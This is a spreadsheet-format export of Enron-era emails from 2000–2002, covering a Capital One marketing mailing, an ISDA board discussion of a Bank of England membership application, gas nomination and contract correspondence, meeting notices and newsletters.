  &lt;http://images.bigfootinteractive.com/creative/new/capone/dec/osr/images/pixel.gif&gt;_x000D_
	_x000D_
  &lt;http://images.bigfootinteractive.com/creative/new/capone/dec/osr/images/pixel.gif&gt;	  &lt;http://images.bigfootinteractive.com/creative/new/capone/dec/osr/images/pixel.gif&gt;_x000D_
	_x000D_
  &lt;http://images.bigfootinteractive.com/creative/new/capone/dec/osr/images/pixel.gif&gt;	  &lt;http://images.bigfootinteractive.com/creative/new/capone/dec/osr/images/pixel.gif&gt;  &lt;http://images.bigfootinteractive.com/creative/new/capone/dec/osr/images/pixel.gif&gt;  &lt;http://images.bigfootinteractive.com/creative/new/capone/dec/osr/images/pixel.gif&gt;_x000D_
You're just minutes away from saving on auto or life insurance! Find out if you can save money now._x000D_
Get instant insurance quotes &lt;http://capitalone.bfi0.com/Y0RH0615A5E43EDF1974&gt;._x000D_
 INS Web &lt;http://images.bigfootinteractive.com/creative/new/capone/dec/osr/images/insweb.gif&gt;_x000D_
_x000D_
	  &lt;http://images.bigfootinteractive.com/creative/new/capone/dec/osr/images/pixel.gif&gt;	_x000D_
  &lt;http://images.bigfootinteractive.com/creative/new/capone/dec/osr/images/pixel.gif&gt;_x000D_
	_x000D_
  &lt;http://images.bigfootinteractive.com/creative/new/capone/dec/osr/images/pixel.gif&gt;_x000D_
	_x000D_
  &lt;http://images.bigfootinteractive.com/creative/new/capone/dec/osr/images/pixel.gif&gt;	_x000D_
  &lt;http://images.bigfootinteractive.com/creative/new/capone/dec/osr/images/pixel.gif&gt;	  &lt;http://images.bigfootinteractive.com/creative/new/capone/dec/osr/images/pixel.gif&gt;  &lt;http://images.bigfootinteractive.com/creative/new/capone/dec/osr/images/pixel.gif&gt;  &lt;http://images.bigfootinteractive.com/creative/new/capone/dec/osr/images/pixel.gif&gt;_x000D_
Do you know who's been looking at your credit? Visit Credit Reports for an online snapshot of your credit history._x000D_
_x000D_
We'll get you there in no time._x000D_
Visit Credit Reports &lt;http://capitalone.bfi0.com/Y0RH0615A5E73EDF1974&gt;._x000D_
 PrivacyGuard.com &lt;http://images.bigfootinteractive.com/creative/new/capone/dec/osr/images/privacyguard.gif&gt;_x000D_
_x000D_
	  &lt;http://images.bigfootinteractive.com/creative/new/capone/dec/osr/images/pixel.gif&gt;	_x000D_
  &lt;http://images.bigfootinteractive.com/creative/new/capone/dec/osr/images/pixel.gif&gt;	_x000D_
  &lt;http://images.bigfootinteractive.com/creative/new/capone/dec/osr/images/pixel.gif&gt;_x000D_
	  &lt;http://images.bigfootinteractive.com/creative/new/capone/dec/osr/images/pixel.gif&gt;_x000D_
	_x000D_
  &lt;http://images.bigfootinteractive.com/creative/new/capone/dec/osr/images/pixel.gif&gt;	  &lt;http://images.bigfootinteractive.com/creative/new/capone/dec/osr/images/pixel.gif&gt;  &lt;http://images.bigfootinteractive.com/creative/new/capone/dec/osr/images/pixel.gif&gt;  &lt;http://images.bigfootinteractive.com/creative/new/capone/dec/osr/images/pixel.gif&gt;_x000D_
Did you know we now offer vehicle financing with great low rates? Save time and money with a new or used, refinance or lease buyout vehicle loan._x000D_
Go to Capital One Auto Loans &lt;http://capitalone.bfi0.com/Y0RH0615A5E63EDF1974&gt;._x000D_
 PeopleFirst.com &lt;http://images.bigfootinteractive.com/creative/new/capone/dec/osr/images/peoplefirst.gif&gt;_x000D_
_x000D_
	  &lt;http://images.bigfootinteractive.com/creative/new/capone/dec/osr/images/pixel.gif&gt;	_x000D_
  &lt;http://images.bigfootinteractive.com/creative/new/capone/dec/osr/images/pixel.gif&gt;	_x000D_
  &lt;http://images.bigfootinteractive.com/creative/new/capone/dec/osr/images/pixel.gif&gt;_x000D_
	_x000D_
  &lt;http://images.bigfootinteractive.com/creative/new/capone/dec/osr/images/pixel.gif&gt;	_x000D_
  &lt;http://images.bigfootinteractive.com/creative/new/capone/dec/osr/images/pixel.gif&gt;	  &lt;http://images.bigfootinteractive.com/creative/new/capone/dec/osr/images/pixel.gif&gt;  &lt;http://images.bigfootinteractive.com/creative/new/capone/dec/osr/images/pixel.gif&gt;  &lt;http://images.bigfootinteractive.com/creative/new/capone/dec/osr/images/pixel.gif&gt;_x000D_
Looking to lower your monthly car payment?_x000D_
_x000D_
Visit Capital One Auto Refinance to see how much you could save &lt;http://capitalone.bfi0.com/Y0RH0615A5E13EDF1974&gt;._x000D_
 PeopleFirst.com &lt;http://images.bigfootinteractive.com/creative/new/capone/dec/osr/images/peoplefirst.gif&gt;_x000D_
_x000D_
_x000D_
	  &lt;http://images.bigfootinteractive.com/creative/new/capone/dec/osr/images/pixel.gif&gt;	_x000D_
  &lt;http://images.bigfootinteractive.com/creative/new/capone/dec/osr/images/pixel.gif&gt;	_x000D_
  &lt;http://images.bigfootinteractive.com/creative/new/capone/dec/osr/images/pixel.gif&gt;_x000D_
	 	_x000D_
  &lt;http://images.bigfootinteractive.com/creative/new/capone/dec/osr/images/pixel.gif&gt;_x000D_
	_x000D_
  &lt;http://images.bigfootinteractive.com/creative/new/capone/dec/osr/images/pixel.gif&gt;	  &lt;http://images.bigfootinteractive.com/creative/new/capone/dec/osr/images/pixel.gif&gt;	_x000D_
? 2002 Capital One Services, Inc. Capital One is a federally registered service mark. All rights reserved._x000D_
	_x000D_
  &lt;http://capitalone.bfi0.com/Y0GH079AB6553EDF1974&gt;</t>
  </si>
  <si>
    <t>Wed, 17 Oct 2001 02:50:54 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jm_hernandez-beneyto@bmg.bsch.es'})</t>
  </si>
  <si>
    <t>RE: Bank of England Application</t>
  </si>
  <si>
    <t xml:space="preserve">I support the application._x000D_
_x000D_
Regards,_x000D_
_x000D_
Jos? M. Hern?ndez_x000D_
_x000D_
   -----Original Message-----_x000D_
   From:       RPICKEL@isda.org [SMTP:RPICKEL@isda.org]_x000D_
   Sent:       12 October 2001 17:59_x000D_
   To:         BOARD@isda.org_x000D_
   Cc:         RPICKEL@isda.org; MCUNNINGHAM@isda.org;_x000D_
               esebton@isda-eur.org; rmetcalfe@isda-eur.org_x000D_
   Subject:    Bank of England Application_x000D_
   _x000D_
   Shortly before the teleconference Board meeting two weeks ago we_x000D_
   received an_x000D_
   application from the Bank of England for subscriber membership. When_x000D_
   we have_x000D_
   considered central banks or government agencies for membership in the_x000D_
   past,_x000D_
   consideration has focused on the nature of the applicant's_x000D_
   derivatives_x000D_
   activities, its regulatory role and the type of information they are_x000D_
   likely_x000D_
   to obtain from ISDA. Because of their derivatives activities, we have_x000D_
   generally admitted these applicants (e.g., the Kingdoms of Belgium,_x000D_
   Denmark_x000D_
   and Sweden, the Reserve Banks of South Africa and New Zealand). We_x000D_
   have even_x000D_
   admitted the Bank for International Settlements as a member. In_x000D_
   general, we_x000D_
   let them know that they may not be able to receive the full range of_x000D_
   ISDA_x000D_
   materials (e.g., draft comment letters or position papers) and that_x000D_
   there_x000D_
   may be a need to exclude them from certain committees or discussions._x000D_
    _x000D_
   In previous Board discussions, a higher degree of concern has been_x000D_
   expressed_x000D_
   if, theoretically, the Federal Reserve, the Bank of Japan, the Bank_x000D_
   of_x000D_
   England or similarly influential central banks were to apply for_x000D_
   membership._x000D_
   These central banks typically have a greater degree of involvement in_x000D_
   the_x000D_
   regulatory debates (particularly on capital) and are better_x000D_
   positioned to_x000D_
   influence the process._x000D_
    _x000D_
   Since some of those previous debates, the regulatory role of the Bank_x000D_
   of_x000D_
   England has diminished and the role of the Financial Services_x000D_
   Authority has_x000D_
   correspondingly increased. The Bank of England still plays the_x000D_
   traditional_x000D_
   central bank roles of controller of the money supply, dealing in the_x000D_
   market_x000D_
   and lender of last resort, but the supervisory role has shifted to_x000D_
   the FSA. _x000D_
    _x000D_
   In light of these developments, but recognizing the concerns_x000D_
   previously_x000D_
   expressed on central bank membership, I would appreciate your views_x000D_
   on the_x000D_
   application of the Bank of England. We have also had overtures from_x000D_
   the Hong_x000D_
   Kong Monetary Authority regarding membership although we have not_x000D_
   received_x000D_
   an application._x000D_
    _x000D_
   Please share your views with the other members of the Board._x000D_
    _x000D_
   Bob_x000D_
   _x000D_
   </t>
  </si>
  <si>
    <t>Thu, 1 Jun 2000 10:04:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Carthage (American Central) Nomination</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Ami Chokshi/Corp/Enron on 06/01/2000 _x000D_
05:03 PM ---------------------------_x000D_
_x000D_
_x000D_
"Steve Holmes" &lt;Steve.Holmes@dvn.com&gt; on 06/01/2000 04:15:11 PM_x000D_
To: &lt;Ami.Chokshi@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: Carthage (American Central) Nomination_x000D_
_x000D_
_x000D_
Chad called and said you guys are requestiing approximately 74,000 MMBtu _x000D_
effective June 1.  I show the number should be 72,240 MMBtu/d.  Could you _x000D_
please check into this and let me know what's going on?_x000D_
_x000D_
Thanks,_x000D_
Steve_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 16 Nov 2000 07:05:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Updated Line Pack Gas Purchase Agreement form provided by_x000D_
 Vector.</t>
  </si>
  <si>
    <t xml:space="preserve">That would be great._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kevin_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Dan J Hyvl_x000D_
11/14/2000 12:51 PM_x000D_
To: Kevin Ruscitti/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Updated Line Pack Gas Purchase Agreement form provided by _x000D_
Vector.  _x000D_
_x000D_
They appear to have made the changes that we requested.  Do you want me to _x000D_
fill in the name of the Seller and print off 2 originals for signature.  If _x000D_
not, please fill in the name and forward to me for initialling before the _x000D_
contract is signed by ENA..  _x000D_
_x000D_
_x000D_
_x000D_
	Kevin Ruscitti_x000D_
	11/14/2000 12:01 PM_x000D_
		_x000D_
		 To: Dan J Hyvl/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Re: Updated Line Pack Gas Purchase Agreement form provided by _x000D_
Vector._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 25 Jan 2002 01:02:49 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'reports@reedwasden.com'})</t>
  </si>
  <si>
    <t>Sound Energy 1.23.02</t>
  </si>
  <si>
    <t>Hello Mike Swerzbin,_x000D_
_x000D_
RWR would like to welcome you again to our second edition of Sound Energy.  You will receive this publication on a free trial basis for the next 45 days._x000D_
_x000D_
Every two weeks, we look at energy companies and sectors that strive to make energy more efficient or the environment cleaner.  These_x000D_
sectors include renewable energy (including wind and solar power),_x000D_
distributed generation (fuel cells and microturbines), and power_x000D_
semiconductors.  _x000D_
_x000D_
This edition includes: _x000D_
- Feature Article:  Is Wind Still Blowing?  A closer look at the U.S. wind market._x000D_
- Overview of renewables, distributed generation and power semiconductor sectors._x000D_
_x000D_
Download this report from the &lt;a href='http://www.reedwasden.com/members/download.asp?ID=108&amp;email=mike.swerzbin@enron.com'&gt;Reed Wasden website&lt;/a&gt;.  If a link does not appear above please goto http://www.reedwasden.com/members/download.asp?ID=108&amp;email=mike.swerzbin@enron.com to download the report._x000D_
_x000D_
Thank you,_x000D_
The Sector Reports Team_x000D_
_x000D_
As always, we welcome any feedback on our research including questions and opinions.  To be removed from this mailing, reply to this email with 'UNSUBSCRIBE-Sector Reports' in the subject field.</t>
  </si>
  <si>
    <t>Fri, 7 Jul 2000 12:22:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: CommodityLogic Team Mtg. July 12th</t>
  </si>
  <si>
    <t xml:space="preserve">Brenda:  I mentioned to Tom that I will be on vacation the week of July 10, _x000D_
so I will not attend the July 12th meeting.  Please remind him of that.  _x000D_
Thanks.  _x000D_
_x000D_
_x000D_
_x000D_
07/07/2000 03:30 PM_x000D_
Brenda Flores-Cuellar@ENRON_x000D_
Brenda Flores-Cuellar@ENRON_x000D_
Brenda Flores-Cuellar@ENRON_x000D_
07/07/2000 03:30 PM_x000D_
07/07/2000 03:30 PM_x000D_
To: Sally Beck/HOU/ECT@ECT, D Todd Hall/HOU/ECT@ECT, Brent A _x000D_
Price/HOU/ECT@ECT, Tommy J Yanowski/HOU/ECT@ECT, Leslie Reeves/HOU/ECT@ECT, _x000D_
Thresa A Allen/HOU/ECT@ECT, Jennifer deBoisblanc Denny/HOU/ECT@ECT, Alan _x000D_
Aronowitz/HOU/ECT@ECT, Debbie R Brackett/HOU/ECT@ECT, Simon _x000D_
Sear/Corp/Enron@ENRON, John Norden/HOU/ECT@ECT, John _x000D_
Pavetto/Corp/Enron@Enron, Chris Schomer/Corp/Enron@ENRON, Jeff _x000D_
Blumenthal/HOU/ECT@ECT, Susan Harrison/HOU/ECT@ECT, Patti _x000D_
Thompson/HOU/ECT@ECT, Lynn Tippery/HOU/ECT@ECT, Xochil Moreno/HOU/ECT@ECT, _x000D_
Joya Davis/HOU/ECT@ECT, Darlene C Forsyth/HOU/ECT@ECT, Dorothy _x000D_
Youngblood/HOU/ECT@ECT, Yolanda Ford/HOU/ECT@ECT, Irena D Hogan/HOU/ECT@ECT, _x000D_
Chantelle Villanueva/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: CommodityLogic Team Mtg. July 12th_x000D_
_x000D_
	_x000D_
_x000D_
FYI (location change to next weeks meeting):_x000D_
_x000D_
Our weekly CommodityLogic Team meeting will be held in EB 30C1 on Wednesday _x000D_
from 10am - 11am. If you have any questions or will be UNABLE to attend, _x000D_
please feel free to send me an e-mail or call me._x000D_
_x000D_
Thanks,_x000D_
Brenda_x000D_
x31914_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 3 Jan 2001 02:43:00 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: Follow up materials</t>
  </si>
  <si>
    <t>Jeff, thanks so much!  Don't know how I missed this email last night._x000D_
Really appreciate it, and look forward to receiving the remaining material._x000D_
The Governor referenced the nordpool last night in a session, so this will_x000D_
make our research alot easier, at least on that one!!!_x000D_
_x000D_
-----Original Message-----_x000D_
From: Jeff.Dasovich@enron.com [mailto:Jeff.Dasovich@enron.com]_x000D_
Sent: Tuesday, January 02, 2001 6:22 PM_x000D_
To: kari.dohn@gov.ca.gov_x000D_
Subject: Follow up materials_x000D_
_x000D_
_x000D_
Greetings Kari:_x000D_
_x000D_
Attached is follow-up information from the meeting that the Governor and_x000D_
you had with Ken Lay and Steve Kean last Thursday.  Tomorrow morning I will_x000D_
email three additional pieces of information:_x000D_
_x000D_
Our specific comments on the proposals that the Governor raised at the_x000D_
meeting._x000D_
More details on the "demand buy-down" concept._x000D_
Information on Norway's version of the ISO, "Nord Pool."_x000D_
_x000D_
If there's anything you need, don't hesitate to contact me at 415.782.7822._x000D_
_x000D_
Happy New Year._x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
_x000D_
(See attached file: Follow up to Gov Davis-Ken Lay meeting0102.doc)</t>
  </si>
  <si>
    <t>Wed, 1 Aug 2001 07:36:19 -0700 (PDT)</t>
  </si>
  <si>
    <t>BHP copper</t>
  </si>
  <si>
    <t>J.,_x000D_
_x000D_
BHP is still in the market for Balance august San Juan.  Can we do this or can you call that guy that spiro recommended ASAP?  Please let me know._x000D_
_x000D_
thanks,_x000D_
_x000D_
Kim</t>
  </si>
  <si>
    <t>Tue, 2 Oct 2001 12:02:20 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'corey.grindal@elpaso.com'})</t>
  </si>
  <si>
    <t>I can't get through on the phones.  Please call me 713-853-4743</t>
  </si>
  <si>
    <t>Fri, 18 Jan 2002 13:27:44 -0800 (PST)</t>
  </si>
  <si>
    <t>SCS CLOSING NATURAL GAS OPTIONS STRADDLE UPDATE...HAVE A GOOD_x000D_
 WEEKEND</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
 _x000D_
 - 1_18_02ON.xls </t>
  </si>
  <si>
    <t>Wed, 23 Aug 2000 10:42:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: TFF2001 Meeting Date Question</t>
  </si>
  <si>
    <t xml:space="preserve">John,_x000D_
_x000D_
Easter may not work for me because I shall most likely_x000D_
be visiting my son who goes to school in California (we were spending_x000D_
Easter together for the last three years)._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"John D. Martin" &lt;J_Martin@baylor.edu&gt; on 08/21/2000 01:42:14 PM_x000D_
To: aagrawal@cba.ua.edu, Andres Almazan &lt;Andres.Almazan@bus.utexas.edu&gt;, _x000D_
bethel@babson.edu, Murat Binay &lt;mbinay@mail.utexas.edu&gt;, _x000D_
abutler@finance.bus.lsu.edu, Tyrone.Callahan@bus.utexas.edu, Murray Carlson _x000D_
&lt;carlsonm@mail.utexas.edu&gt;, chapman@eco.utexas.edu, Kent Daniel _x000D_
&lt;kent@kent.kellogg.nwu.edu&gt;, fdiebold@stern.nyu.edu, lederington@ou.edu, _x000D_
Harper1@U.Washington.edu, sgillan@tiaa-cref.org, Stuart Gillan _x000D_
&lt;sgillan@tiaa-cref.org&gt;, Denis Gromb &lt;dgromb@MIT.EDU&gt;, grullon@rice.edu, _x000D_
jarradh@oregon.uoregon.edu, jhartzel@stern.nyu.edu, Jhund@mail.utexas.edu, _x000D_
daveike@rice.edu, jegadees@uiuc.edu, Cindy.Justice@enron.com, Matthias Kahl _x000D_
&lt;matthias.kahl@anderson.ucla.edu&gt;, Vince.J.Kaminski@enron.com, _x000D_
zkhokher@mail.utexas.edu, alynch@debit.stern.nyu.edu, Andras Marosi _x000D_
&lt;Andras.Marosi@bus.utexas.edu&gt;, "John D. Martin" &lt;J_Martin@baylor.edu&gt;, _x000D_
Maxwell@ba.ttu.edu, Beth Miertschin &lt;Beth.Miertschin@enron.com&gt;, _x000D_
metrick@Wharton.upenn.edu, "Thomas H. Noe" &lt;tnoe@mailhost.tcs.tulane.edu&gt;, _x000D_
Parrino@mail.utexas.edu, Bill Petty &lt;Bill_Petty@baylor.edu&gt;, manju puri _x000D_
&lt;mpuri@Stanford.EDU&gt;, Ramnath@rice.edu, rampini@nwu.edu, _x000D_
steve_rich@baylor.edu, eronn@mail.utexas.edu (Ehud I. Ronn), Kemal Saatcioglu _x000D_
&lt;KemalS@mail.utexas.edu&gt;, Akin Sayrak &lt;asayrak@katz.pitt.edu&gt;, _x000D_
sirri@babson.edu, Laura Starks &lt;lstarks@mail.utexas.edu&gt;, suarez@cemfi.es, _x000D_
"A. Subrahmanyam" &lt;asubrahm@anderson.ucla.edu&gt;, _x000D_
Stice@mailhost.tcs.tulane.edu, Titman@mail.utexas.edu, _x000D_
stathis.tompaidis@bus.utexas.edu, wangfa@rice.edu, hong.yan@bus.utexas.edu, _x000D_
Beth Miertschin &lt;Beth.Miertschin@enron.com&gt;, gwillard@MIT.EDU_x000D_
cc:  _x000D_
Subject: TFF2001 Meeting Date Question_x000D_
_x000D_
_x000D_
Hello from Texas,_x000D_
_x000D_
We are trying to set up our meeting date for the 2001 conference and have run _x000D_
into a snag.  We cannot get our San Antonio hotel on the first weekend in _x000D_
April (as last year).  However, we can get the hotel and make all our "fun" _x000D_
arrangements for the second weekend in April.  However, this is Easter _x000D_
weekend.  The good news is that the room rates are substantially lower _x000D_
because it's a holiday.  However, we are concerned that holding the meeting _x000D_
on this particular Friday-Saturday will interfere with family plans such that _x000D_
some or many of you may not be able to attend.  _x000D_
_x000D_
My related question to you is this:_x000D_
_x000D_
Does holding the meeting on the second weekend in April (Easter weekend) pose _x000D_
a problem for you?  Please give us your thoughts ASAP even if you think you _x000D_
may not be able to attend this year's conference.  We need your opinion to _x000D_
guide our decision._x000D_
_x000D_
Thanks and I hope to see you all again next April (sometime)!_x000D_
_x000D_
John _x000D_
_x000D_
p.s.  We are very fortunate to have Enron return as our corporate sponsor _x000D_
again this year.  _x000D_
John D. Martin_x000D_
Carr P. Collins Chair in Finance_x000D_
Finance Department_x000D_
Baylor University_x000D_
PO Box 98004_x000D_
Waco, TX 76798_x000D_
254-710-4473 (Office)_x000D_
254-710-1092 (Fax)_x000D_
J_Martin@Baylor.edu_x000D_
web:    http://hsb.baylor.edu/html/martinj/home.html  _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 22 Jun 2000 12:31:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'joan.quick@enron.com', 'susan.smith@enron.com', 'marilyn.colbert@enron.com', 'imelda.frayre@enron.com', 'michael.morris@enron.com', 'sylvia.campos@enron.com', 'faye.ellis@enron.com', 'neal.symms@enron.com', 'genia.fitzgerald@enron.com', 'patrice.mims@enron.com', 'brad.coleman@enron.com', 'sylvia.pollan@enron.com', 'mary.gosnell@enron.com', 'dutch.quigley@enron.com', 'connie.sutton@enron.com', 'mary.solmonson@enron.com', 'cris.sherman@enron.com', 'chris.wiebe@enron.com', 'lisa.carver@enron.com', 'elizabeth.hernandez@enron.com', 'mary.botello@enron.com', 'larry.hunter@enron.com', 'edward.terry@enron.com', 'dianne.seib@enron.com', 'melissa.graves@enron.com', 'christa.winfrey@enron.com', 'kenneth.harmon@enron.com', 'shonnie.daniel@enron.com', 'anita.patton@enron.com', 'melba.lozano@enron.com', 'cyril.price@enron.com', 'colleen.sullivan@enron.com', 'elsa.villarreal@enron.com', 'peggy.alix@enron.com', 'anthony.campos@enron.com', 'vance.taylor@enron.com', 'bill.hare@enron.com', 'irene.flynn@enron.com', 'jason.moore@enron.com', 'victor.lamadrid@enron.com', 'debbie.brackett@enron.com', 'amelia.alland@enron.com', 'mark.thorne@enron.com', 'samuel.schott@enron.com', 'john.sherriff@enron.com', 'mary.smith@enron.com', 'laura.vargas@enron.com', 'kimberlee.bennick@enron.com', 'donald.reinhardt@enron.com', 'brenda.herod@enron.com', 'scotty.gilbert@enron.com', 'clem.cernosek@enron.com', 'bernice.rodriguez@enron.com', 'john.powell@enron.com', 'peggy.hedstrom@enron.com', 'andrew.lewis@enron.com', 'richard.mckeel@enron.com', 'yolanda.cordova-gilbert@enron.com', 'tara.sweitzer@enron.com', 'tony.harris@enron.com', 'edward.baughman@enron.com', 'nella.cappelletto@enron.com', 'daren.farmer@enron.com', 'susan.bailey@enron.com', 'geoff.storey@enron.com', 'lauri.allen@enron.com', 'kim.theriot@enron.com', 'russell.diamond@enron.com', 'nanette.kettler@enron.com', 'jefferson.sorenson@enron.com', 'bridgette.anderson@enron.com', 'rahil.jafry@enron.com', "romeo.d'souza@enron.com", 'carrie.southard@enron.com', 'scott.lytle@enron.com', 'cheryl.dawes@enron.com', 'marilyn.schoppe@enron.com', 'bob.klein@enron.com', 'enron.facilities@enron.com', 'gary.lamphier@enron.com', 'willie.stewart@enron.com', 'scott.mills@enron.com', 'john.suttle@enron.com', 'fred.boas@enron.com', 'john.nowlan@enron.com', 'shawna.flynn@enron.com', 'veronica.espinoza@enron.com', 'chris.mendoza@enron.com', 'marlene.hilliard@enron.com', 'karen.lambert@enron.com', 'george.weissman@enron.com', 'kori.loibl@enron.com', 'lisa.gillette@enron.com', 'sony.wilson@enron.com', 'kristian.lande@enron.com', 'richard.pinion@enron.com', 'enron.counterparty@enron.com', 'mike.croucher@enron.com', 'tom.moore@enron.com', 'jackie.morgan@enron.com', 'cheryl.dudley@enron.com', 'carlos.rodriguez@enron.com', 'rhonda.denton@enron.com', 'frances.ortiz@enron.com', 'linda.bryan@enron.com', 'claire.viejou@enron.com', 'hoong.foon@enron.com', 'jacquelyn.farriel@enron.com', 'andrea.guillen@enron.com', 'corey.hobbs@enron.com', 'jim.little@enron.com', 'stacy.dickson@enron.com', 'elsie.lew@enron.com', 'julie.meyers@enron.com', 'matt.motsinger@enron.com', 'carey.metz@enron.com', 'brent.price@enron.com', 'carolyn.gilley@enron.com', 'robert.cotten@enron.com', 'randall.gay@enron.com', 'bradley.diebner@enron.com', 'susan.flynn@enron.com', 'robert.walker@enron.com', 'cary.carrabine@enron.com', 'rebecca.ford@enron.com', 'susan.harrison@enron.com', 'nathan.hlavaty@enron.com', 'torrey.moorer@enron.com', 'debra.perlingiere@enron.com', 'katherine.kelly@enron.com', 'philippe.travis@enron.com', 'amita.gosalia@enron.com', 'michael.eiben@enron.com', 'sheri.thomas@enron.com', 'tracy.ngo@enron.com', 'hillary.mack@enron.com', 'anne.bike@enron.com', 'veronica.thompson@enron.com', 'kathryn.cordes@enron.com', 'frank.davis@enron.com', 'nidia.mendoza@enron.com', 'brad.schneider@enron.com', 'b.palmer@enron.com', 'david.hardy@enron.com', 'susan.trevino@enron.com', 'jeremy.wong@enron.com', 'sam.round@enron.com', 'stephanie.sever@enron.com', 'brant.reves@enron.com', 'diane.ellstrom@enron.com', 'jim.homco@enron.com', 'laurel.adams@enron.com', 'dale.neuner@enron.com', 'regina.perkins@enron.com', 'suzy.robey@enron.com', 'james.shirley@enron.com', 'rita.wynne@enron.com', 'michele.small@enron.com', 'donna.consemiu@enron.com', 'arfan.aziz@enron.com', 'bruce.mills@enron.com', 'pat.clynes@enron.com', 'beth.apollo@enron.com', 'cindy.horn@enron.com', 'jennifer.denny@enron.com', 'lesli.campbell@enron.com', 'cyndie.balfour-flanagan@enron.com', 'troy.klussmann@enron.com', 'lynn.shivers@enron.com', 'gary.nelson@enron.com', 'mechelle.stevens@enron.com', 'tana.jones@enron.com', 'debbie.nicholls@enron.com', 'dianne.swiber@enron.com', 'stacey.richardson@enron.com', 'curtis.smith@enron.com', 'winston.goodbody@enron.com', "o'neal.winfree@enron.com", 'jennifer.blay@enron.com', 'leslie.reeves@enron.com', 'bob.bowen@enron.com', 'paul.henry@enron.com'})</t>
  </si>
  <si>
    <t>CP Name Change/Mergers for June 2000 - Final</t>
  </si>
  <si>
    <t>This should be the last listing for this month unless something critical _x000D_
comes up. _x000D_
_x000D_
For the records with names changes only, I will update Global Counterparty _x000D_
with the new names tomorrow (6/22/00) after 4 PM. I will also change the ERMS _x000D_
SN at the same time._x000D_
_x000D_
If anyone has any issues with these updates, please contact me Friday _x000D_
morning. Thanks! _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Marilyn</t>
  </si>
  <si>
    <t>Thu, 7 Jun 2001 10:23:09 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'billm@hammondshomes.com'})</t>
  </si>
  <si>
    <t>RE: 42 on Thursday</t>
  </si>
  <si>
    <t>Hatch said if Traffic is bad he aint comin'.  I think Jon will play, hes played before, so he will pick up quick, that will make 8._x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	"Murray, Bill" &lt;BillM@HammondsHomes.com&gt;@ENRON [mailto:IMCEANOTES-+22Murray+2C+20Bill+22+20+3CBillM+40HammondsHomes+2Ecom+3E+40ENRON@ENRON.com] _x000D_
Sent:	Thursday, June 07, 2001 12:23 PM_x000D_
To:	Chris Hatcher (E-mail); Williams, Jason (Trading); Mike Morrison (E-mail); Rhonda &amp; Von Jones (E-mail); Todd Perry (E-mail); Peck, Mike_x000D_
Subject:	RE: 42 on Thursday_x000D_
_x000D_
I wanted to give everyone an update on who's coming over tonight.  We're one_x000D_
short for two tables.  Please let me know if you find someone that can play._x000D_
	Chris Hatcher - In_x000D_
	Von Jones - In_x000D_
	Mike Morrison - In (may be a little late)_x000D_
	Bill Murray - In_x000D_
	Mike Peck - In_x000D_
	Todd Perry - In_x000D_
	Jason Williams - In_x000D_
	David Burns - No Reply_x000D_
	Mike Clark - Too far to drive_x000D_
	Chris Ferguson - Going fishing_x000D_
	Gregg Murray - Working late_x000D_
	Scott Walton - Going on vacation_x000D_
_x000D_
&gt;  -----Original Message-----_x000D_
&gt; From: 	Murray, Bill_x000D_
&gt; Sent:	Tuesday, June 05, 2001 4:57 PM_x000D_
&gt; To:	Bill Murray (E-mail); Chris Ferguson (E-mail); Chris Hatcher_x000D_
&gt; (E-mail); Jason Williams (E-mail); Mike Morrison (E-mail); Rhonda &amp; Von_x000D_
&gt; Jones (E-mail); Scott Walton (E-mail); Todd Perry (E-mail)_x000D_
&gt; Cc:	Gregg Murray (E-mail); Clark, Mike; Peck, Mike; David Burns (E-mail)_x000D_
&gt; Subject:	42 on Thursday_x000D_
&gt;_x000D_
&gt; It's that time again.  If you are up for playing 42 this Thursday (6/7),_x000D_
&gt; please let me know.  We'll kick things off around 8:00 PM.  So far, I have_x000D_
&gt; verbal commitments from Jason, Von, and Mike.  I was hoping to get two_x000D_
&gt; tables going and try to play a round robin tourney.  So, Todd (it's been a_x000D_
&gt; couple of weeks), Scott (you said that you wanted to play), Hatch (you had_x000D_
&gt; fun last time, right?), and Ferg (you don't want to miss the fun, do you?)_x000D_
&gt; reply to this e-mail and let me know you can make it._x000D_
&gt;_x000D_
&gt; See ya,_x000D_
&gt; - Bub</t>
  </si>
  <si>
    <t>Fri, 16 Nov 2001 14:42:24 -0800 (PST)</t>
  </si>
  <si>
    <t>Trader, Friday USD -0.07 CRB +2.02 DOW -5.40 S&amp;P -3.59 NAS -1.99</t>
  </si>
  <si>
    <t>F R I D A Y   E V E N I N G   E X T R E M E   M A R K E T S_x000D_
A complimentary service from INO.com ( http://www.ino.com/ )_x000D_
_x000D_
Friday: The CRB Index has advanced 2.02 points to 188.39. The _x000D_
US Dollar Index slipped 0.07 points to 116.44._x000D_
_x000D_
The Dow Industrials fell 5.40 points, at 9866.99, while _x000D_
the S&amp;P 500 declined 3.59 points, last seen at 1138.65. The _x000D_
Nasdaq Composite fell 1.99 points to 1898.58._x000D_
______________________________________________________________________x000D_
_x000D_
* FREE: MANAGED FUTURES &amp; IRA KIT_x000D_
AUDIO &amp; VIDEO, reports, and info on Futures &amp; Options IRAs_x000D_
